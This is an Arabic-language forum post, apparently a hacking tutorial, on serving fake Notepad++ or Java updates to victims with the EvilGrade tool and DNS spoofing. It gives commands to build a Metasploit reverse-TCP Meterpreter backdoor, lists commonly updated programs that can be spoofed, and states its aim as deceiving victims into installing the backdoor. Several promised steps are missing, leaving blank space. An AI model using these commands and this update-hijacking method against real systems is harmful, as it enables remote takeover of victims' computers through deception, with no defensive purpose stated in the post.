notepad++ Upgrades USE EvilGrade & DNS Poison

[Cyber Cool]

كيفكم اخواني واخواتي ان شاء الله الجميع بخير ياآرب .؟!
دوم ان شاء الله مو يوم واتمنى الصحة والعافية للجميع

اليوم معنا موضوع ان شاء الله ينال الاعجباب واستحسان الجميع يارب :

notepad ++ Upgrades USE EvilGrade & DNS Poison



طيب في البداية لازم نعطي خلفية عن الموضوع وتوضيح الفكر ة


EvilGrade سكربت يقوم بعمل ترقية وهمية تحتوي على باك دور يتم حقنه بأحد البرامج التي تطلب تحديث مثل notepad++ أو j a v a

الهدف منه: تسهيل عملية الاختراق بخداع الضحية بوجود تحديث لأحد البرامج المستخدمه من قبله كما يوجد خيار آخر لعمل هجوم MITM

ايضا
Evilgrade الذي سيقوم بتشغيل w e b Server يحتوي على تحديث مزيّف لبرنامج معين يعني ان صح التعبير تخدع هذه

طيب البرامج التى يمكن ان تنطلي الحيلة عليها

J A V A sun
winzip
winamp
itunes
speedbit
openoffice
linkedin
osx
notepadplus
dap

طيب الان نشرح مكا***ية العمل :

1-قوم بتكوين Backdoor باستخدام مشروع ميتاسبلويت بالخيارات التي تناسبنا.
2-استخدام مشروع Evilgrade الذي سيقوم بتشغيل w e b Server يحتوي على تحديث مزيّف لبرنامج j a v a
3-عمل DNS Spoof

الان نذهـب للموقع هذا لتحميل EvilGrade

كود PHP:

http://www.infobyte.com.ar/ 


هذه واجه الموقع زي ماتشفون

كود PHP:

 ./msfpayload windows/meterpreter/reverse_tcp LHOST= your IP LPORT= 4444 x > امتداد الحفظ 


كود PHP:

 cd /pentest/exploits/framework3 


كود PHP:

 wget http://www.infobyte.com.ar/down/isr-evilgrade-1.0.0.tar.gz 


كود PHP:

 tar xvzf isr-evilgrade-1.0.0.tar.gz 


كود PHP:

 tar zxvf Data-dump-1.15.tar.gz 


طيب بعد التعديل الحمد لله الان
الان نكمل بقية الخطوات















الحمد لله انتهى الموضوع واتمنى ان ينال رضاكم وباذن الله اذا امدانا نشرح عملية التحديث للجافا دمت بخير وفي امان الله